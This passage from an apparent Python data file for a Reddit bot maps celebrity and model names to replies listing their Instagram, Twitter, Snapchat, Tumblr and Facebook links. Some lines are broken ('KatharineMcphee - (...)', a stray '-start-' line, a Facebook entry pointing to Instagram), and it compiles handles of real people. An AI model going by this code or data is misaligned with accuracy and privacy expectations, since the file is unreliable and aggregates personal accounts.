\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
NathalieEmmanuel = ("nathalie", "emmanuel")
NathalieEmmanuelReply = """
[Instagram](https://instagram.com/nathalieemmanuel/)\n
[Twitter](https://twitter.com/missnemmanuel)\n
[Tumblr tag (nsfw)](https://www.tumblr.com/search/nathalie+emmanuel)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
HannahFerguson = ("hannah", "ferguson")
HannahFergusonReply = """
[Instagram](https://instagram.com/hannahfergusonofficial/)\n
[Twitter](https://twitter.com/thehannahferg)\n
[Facebook](https://www.facebook.com/TheHannahFerg)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KateHudson = ("kate", "hudson")
KateHudsonReply = """
[Instagram](https://instagram.com/katehudson/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
NinaDobrev = ("nina", "dobrev")
NinaDobrevReply = """
[Instagram](https://instagram.com/ninadobrev)\n
[Twitter](https://twitter.com/ninadobrev/)\n
[Tumblr](https://ninadobrev.tumblr.com/)\n
[Facebook](https://www.facebook.com/NinaDobrev)\n
[Website/whosay](http://www.ninadobrev.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
DaphneJoy = ("daphne", "joy")
DaphneJoyReply = """
Snapchat: DaphneJoyLove \n
[Instagram](https://instagram.com/daphnejoy/)\n
[Twitter](https://twitter.com/DaphneJoy)\n
[Website](http://www.daphnejoy.com/site/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
EmilyRudd = ("emily", "rudd")
EmilyRuddReply = """
Snapchat: emilysteaparty \n
[Instagram](https://instagram.com/emilysteaparty/)\n
[Twitter](https://www.twitter.com/emilysteaparty)\n
[Tumblr](https://emilysteaparty.tumblr.com)\n
[YouTube channel](https://www.youtube.com/user/emilysteaparty)\n
[Facebook](https://www.facebook.com/emilyruddofficial)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
OliviaCulpo = ("olivia", "culpo")
OliviaCulpoReply = """
[Instagram](https://instagram.com/oliviaculpo)\n
[Twitter](https://twitter.com/oliviaculpo)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
OdetteAnnable = ("odette", "annable")
OdetteAnnableReply = """
[Instagram](https://instagram.com/odetteannable)\n
[Twitter](https://twitter.com/OdetteAnnable)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
OlgaKurylenko = ("olga", "kurylenko")
OlgaKurylenkoReply = """
[Instagram](https://instagram.com/olgakurylenkoofficial/)\n
[Twitter](https://twitter.com/OlyaKurylenko)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
BrendaSong = ("brenda", "song")
BrendaSongReply = """
/r/BrendaSong \n
[Instagram](https://instagram.com/brendasong)\n
[Twitter](https://twitter.com/BrendaSong)\n
[Facebook](https://www.facebook.com/BrendaSong)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CarolSeleme = ("carol", "seleme")
CarolSelemeReply = """
[Instagram](https://instagram.com/cadeque/)\n
[Tumblr](http://moorslorac.tumblr.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AlessandraAmbrosio = ("alessandra", "ambrosio")
AlessandraAmbrosioReply = """
[Instagram](https://instagram.com/alessandraambrosio)\n
[Twitter](https://twitter.com/angelalessandra)\n
[Facebook](https://www.facebook.com/Alessandra)\n
[Website](http://www.alessandraambrosio.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AlexSchmidt = ("alex", "schmidt")
AlexSchmidtReply = """
[Instagram](https://instagram.com/alxxschmidt/)\n
[Tumblr](http://alxxschmidt.tumblr.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
RachelHilbert = ("rachel", "hilbert")
RachelHilbertReply = """
Snapchat: rachelhilbert \n
[Instagram](https://instagram.com/rachelhilbert/)\n
[Twitter](https://twitter.com/rachel_hil)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
DevonWindsor = ("devon", "windsor")
DevonWindsorReply = """
[Instagram](https://instagram.com/devwindsor/)\n
[Twitter](https://twitter.com/devwindsor/)\n
[Facebook](https://www.facebook.com/devwindsor)\n
[Website](http://www.devonwindsor.com/home/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
TaylorMarieHill = ("taylor", "marie", "hill")
TaylorMarieHillReply = """
Snapchat: taylor_hill \n
[Instagram](https://instagram.com/taylor_hill/)\n
[Twitter](https://twitter.com/TaylorMarieHill)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KateMara = ("kate", "mara")
KateMaraReply = """
[Twitter](https://twitter.com/katemara)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ChloeGraceMortz = ("chloe", "grace", "mortz")
ChloeGraceMortzReply = """
[Instagram](https://instagram.com/ChloeGMoretz)\n
[Twitter](https://twitter.com/chloegmoretz)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CamilleRowe = ("camille", "camilla", "rowe")
CamilleRoweReply = """
[Instagram](https://instagram.com/fingermonkey/)\n
[Twitter](https://twitter.com/CamilleRowe)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
PeytonList = ("peyton", "list")
PeytonListReply = """
[Instagram](https://instagram.com/peytonlist)\n
[Twitter](https://twitter.com/peytonlist)\n
[Facebook](https://www.facebook.com/peyton.list)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SammiHanratty = ("sammi", "hanratty")
SammiHanrattyReply = """
Snapchat: SammiHanratty1
[Instagram](https://instagram.com/sammihanratty143/)\n
[Twitter](https://twitter.com/SammiHanratty1)\n
[Facebook](https://www.facebook.com/TheOfficialSammiHanratty)\n
[YouTube channel](https://www.youtube.com/channel/UCJkIBX-nVKat9C-1PU7FiZg)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MargotRobbie = ("margot", "robbie")
MargotRobbieReply = """
[Instagram](https://instagram.com/margotrobbie/)\n
[Twitter](https://twitter.com/MargotRobbie)\n
[Whosay](http://www.whosay.com/margotrobbie)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
LaurenCohan = ("lauren", "cohan")
LaurenCohanReply = """
[Instagram](https://instagram.com/LaurenCohan)\n
[Twitter](https://twitter.com/LaurenCohan)\n
[Website](http://laurencohan.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CamilaCabello = ("camila", "cabello")
CamilaCabelloReply = """
[Instagram](https://instagram.com/camila_cabello/)\n
[Twitter](https://twitter.com/CamilaCabello97)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
YvonneStrahovski = ("yvonne", "strahovski")
YvonneStrahovskiReply = """
[Instagram](https://instagram.com/therealyvonnestrahovski/)\n
[Twitter](https://twitter.com/Y_Strahovski/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
OliviaMunn = ("olivia", "munn")
OliviaMunnReply = """
[Instagram](https://instagram.com/oliviamunn/)\n
[Twitter](https://twitter.com/oliviamunn)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KatharineMcphee - ("katharine", "mcphee")
KatharineMcpheeReply = """
[Instagram](https://instagram.com/katharinemcphee/)\n
[Twitter](https://twitter.com/KatharineMcPhee)\n
[Website](http://www.katharinemcphee.net/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
EmmaRoberts = ("emma", "roberts")
EmmaRobertsReply = """
[Instagram](https://instagram.com/emmaroberts/)\n
[Twitter](https://twitter.com/robertsemma)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SalmaHayek = ("salma", "hayek")
SalmaHayekReply = """
[Instagram](https://instagram.com/salmahayek/)\n
[Twitter](https://twitter.com/salmahayek)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KatyaEliseHenry = ("katya", "elise", "henry")
KatyaEliseHenryReply = """
Snapchat: katyahenry \n
[Instagram](https://instagram.com/katyaelisehenry/)\n
[Twitter](https://twitter.com/katyaelisehenry)\n
[Facebook](https://www.facebook.com/katyaehenry)\n
[Website](http://www.katyaelisehenry.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ElizabethGillies = ("elizabeth", "liz", "gillies")
ElizabethGilliesReply = """
/r/lizgillies \n
[Twitter](https://twitter.com/lizgillies)\n
[Facebook](https://www.facebook.com/ElizabethGilliesOfficial/timeline)\n
[YouTube channel](https://www.youtube.com/user/LizGilliesOfficial)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MichelleJenneke = ("michelle", "jenneke")
MichelleJennekeReply = """
[Instagram](https://instagram.com/mjenneke93/)\n
[Twitter](https://twitter.com/MJenneke93)\n
[YouTube channel](https://www.youtube.com/channel/UCOiLtIb9UcXKkulRfMQem1g)\n
[Website](http://www.michellejenneke.com.au/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
GwenCox = ("gwen", "cox")
GwenCoxReply = """
Snapchat: gw3nnyy
[Instagram](https://instagram.com/hologrvphic/)\n
[Tumblr](http://hologrvphicx.tumblr.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
DakotaJohnson = ("dakota", "johnson")
DakotaJohnsonReply = """
[Instagram](https://instagram.com/dakotajohnson/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CamillaLuddington = ("camilla", "luddington")
CamillaLuddingtonReply = """
[Instagram](https://instagram.com/officialcamillaluddington/)\n
[Twitter](https://twitter.com/camilluddington)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
JennaHopkins = ("jenna", "hopkins")
JennaHopkinsReply = """
[Instagram](https://instagram.com/jhopkins_/)\n
[Twitter](https://twitter.com/_jennahop)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
PriscillaQuintana = ("priscilla", "quintana")
PriscillaQuintanaReply = """
[Instagram](https://instagram.com/priscilla_quintana/)\n
[Twitter](https://twitter.com/_paq)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
RachaelFinch = ("rachael", "finch")
RachaelFinchReply = """
[Instagram](https://instagram.com/rachael_finch/)\n
[Twitter](https://twitter.com/RachaelFinch)\n
[YouTube channel](https://www.youtube.com/user/rachaelfinch)\n
[Facebook](https://www.facebook.com/rachaelfinchfanpage)\n
[Website](http://rachaelfinch.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
RachaelTaylor = ("rachael", "taylor")
RachaelTaylorReply = """
[Instagram](https://instagram.com/rachaelmaytaylor/)\n
[Twitter](https://twitter.com/_Rachael_Taylor)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ElisabettaCanalis = ("elisabetta", "canalis")
ElisabettaCanalisReply = """
[Instagram](https://instagram.com/littlecrumb_)\n
[Twitter](https://twitter.com/justelisabetta)\n
[Website](http://www.elisabettacanalis.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SolveigMorkHansen = ("sloveig", "mork", "hansen")
SolveigMorkHansenReply = """
[Instagram](https://instagram.com/notsolveig)\n
[Twitter](https://twitter.com/mhsolveig)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AlyssaMilano = ("alyssa", "milano")
AlyssaMilanoReply = """
[Instagram](https://instagram.com/milano_Alyssa/)\n
[Twitter: personal](https://twitter.com/Alyssa_Milano)\n
[Facebook](https://www.facebook.com/AlyssaMilano)\n
[Twitter: AlyssaDotCom](https://twitter.com/AlyssaDotCom)\n
[Twitter: TouchByAM](https://twitter.com/TouchByAM)\n
[Website](http://alyssa.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
FrancoiseBoufhal = ("francoise", "boufhal")
FrancoiseBoufhalReply = """
[Instagram](https://instagram.com/francoisebouf/)\n
[Twitter](https://twitter.com/francoisebouf)\n
[Facebook](https://www.facebook.com/officialfrancoise)\n
[YouTube channel](https://www.youtube.com/user/officialfrancoise)\n
[Website](http://www.officialfrancoise.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KimberleyGarner = ("kimberley", "garner")
KimberleyGarnerReply = """
[Instagram](https://instagram.com/kimberleylondon)\n
[Twitter](https://twitter.com/KimberleyLondon)\n
[Website](http://www.kimberleylondon.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CarlyCraig = ("carly", "craig")
CarlyCraigReply = """
[Instagram](https://instagram.com/carlyccraig/)\n
[Twitter](https://twitter.com/carly_craig)\n
[Facebook](https://www.facebook.com/CarlyCraigFB)\n
[YouTube channel](https://www.youtube.com/user/carlycraig)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KarolinaKurkova = ("karolina", "kurkova")
KarolinaKurkovaReply = """
[Instagram](https://instagram.com/karolinakurkova)\n
[Twitter](https://twitter.com/KarolinaKurkova)\n
[Facebook](https://www.facebook.com/KarolinaKurkova)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
LindsayHeyser = ("lindsay", "heyser")
LindsayHeyserReply = """
[Instagram](https://instagram.com/lheyser/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
RachelHurdWood = ("rachel", "hurdwood")
RachelHurdWoodReply = """
[Instagram](https://instagram.com/1rachelhurdwood/)\n
[Twitter](https://twitter.com/rachelhurdwood)\n
[Facebook](https://www.facebook.com/rachelhurdwood/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
TiannaGregory = ("tianna", "gregory")
TiannaGregoryReply = """
Snapchat: TiannaGregory
[Instagram](https://instagram.com/_tiannag/)\n
[Twitter](https://twitter.com/_TiannaG)\n
[Tumblr](http://tnutty.tumblr.com/)\n
[Facebook](https://www.facebook.com/pages/Tianna-Gregory/585670294906217)\n
[Website](http://www.tiannagregory.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
PaigeSpiranac = ("paige", "spiranac")
PaigeSpiranacReply = """
[Instagram](https://instagram.com/_paige.renee/)\n
[Twitter](https://twitter.com/PaigeSpiranac)\n
[Facebook](https://www.facebook.com/paigereneespiranac)\n
[Website](http://paigespiranac.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
GeorgiaMayJagger = ("georgia", "may", "jagger")
GeorgiaMayJaggerReply = """
[Instagram](https://instagram.com/georgiamayjagger/)\n
[Twitter](https://twitter.com/GeorgiaMJagger)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
BrookeBurke = ("brooke", "burke")
BrookeBurkeReply = """
[Instagram](https://instagram.com/brookeburke/)\n
[Twitter](https://twitter.com/BrookeBurke)\n
[Facebook](https://www.facebook.com/pages/Brooke-Burke/261925180496418)\n
[WhoSay](http://www.whosay.com/brookeburke)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SydneyFullerMarr = ("sydney", "fuller", "marr")
SydneyFullerMarrReply = """
[Instagram](https://instagram.com/misssydneyfuller/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
-start-
JennaJenovich = ("jenna", "jenovich")
JennaJenovichReply = """
Snapchat: jennajenovich
[Instagram](https://instagram.com/jennajenovich/)\n
[Twitter](https://twitter.com/JennaJenovich)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
OliviaJordan = ("olivia", "jordan")
OliviaJordanReply = """
[Instagram](https://instagram.com/theoliviajordan/)\n
[Twitter - personal](https://twitter.com/theOliviaJordan)\n
[Twitter - @MissUSA](https://twitter.com/missusa)\n
[Facebook](https://www.facebook.com/theoliviajordan)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
HannahPolites = ("hannah", "polites")
HannahPolitesReply = """
[Instagram](https://instagram.com/hannahpolites)\n
[Facebook](https://www.facebook.com/hannah.polites)\n
[Website](http://hannahpolites.com.au/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
DeniseMilani = ("denise", "milani")
DeniseMilaniReply = """
[Instagram](https://instagram.com/denisemilaniofficial/)\n
[Facebook](https://instagram.com/denisemilaniofficial/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KatherineTimokhina = ("catherine", "katherine", "timokhina")
KatherineTimokhinaReply = """
[Instagram](https://instagram.com/katrintim93/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
celebs = ({SelenaGomez: SelenaGomezReply}, {AlexisRen: AlexisRenReply}, {TaylorSwift: TaylorSwiftReply}, {McKaylaMaroney: McKaylaMaroneyReply},\
{SarahHyland: SarahHylandReply}, {ArielWinter: ArielWinterReply}, {KarlieKloss: KarlieKlossReply}, {KendallJenner: KendallJennerReply},\
{KylieJenner: KylieJennerReply}, {ChloeBennet: ChloeBennetReply}, {HayleyAtwell: HayleyAtwellReply}, {AnnaKendrick: AnnaKendrickReply},\
{DaniThorne: DaniThorneReply}, {BellaThorne: BellaThorneReply}, {EmiliaClarke: EmiliaClarkeReply}, {JessicaBiel: JessicaBielReply},\
{AshleyBenson: AshleyBensonReply}, {MelissaBenoist: MelissaBenoistReply}, {MilanaVayntrub: MilanaVayntrubReply}, {HeidiKlum: HeidiKlumReply},\
{StanaKatic: StanaKaticReply}, {BlakeLively: BlakeLivelyReply}, {MelissaDebling: MelissaDeblingReply}, {SarahShahi: SarahShahiReply},\
{IrinaShayk: IrinaShaykReply}, {MarinaNery: MarinaNeryReply}, {SandraRadav: SandraRadavReply}, {VanessaHudgens: VanessaHudgensReply},\
{KellyBrook: KellyBrookReply}, {MandyMoore: MandyMooreReply}, {AnnaFaith: AnnaFaithReply}, {LexieGrace: LexieGraceReply},\
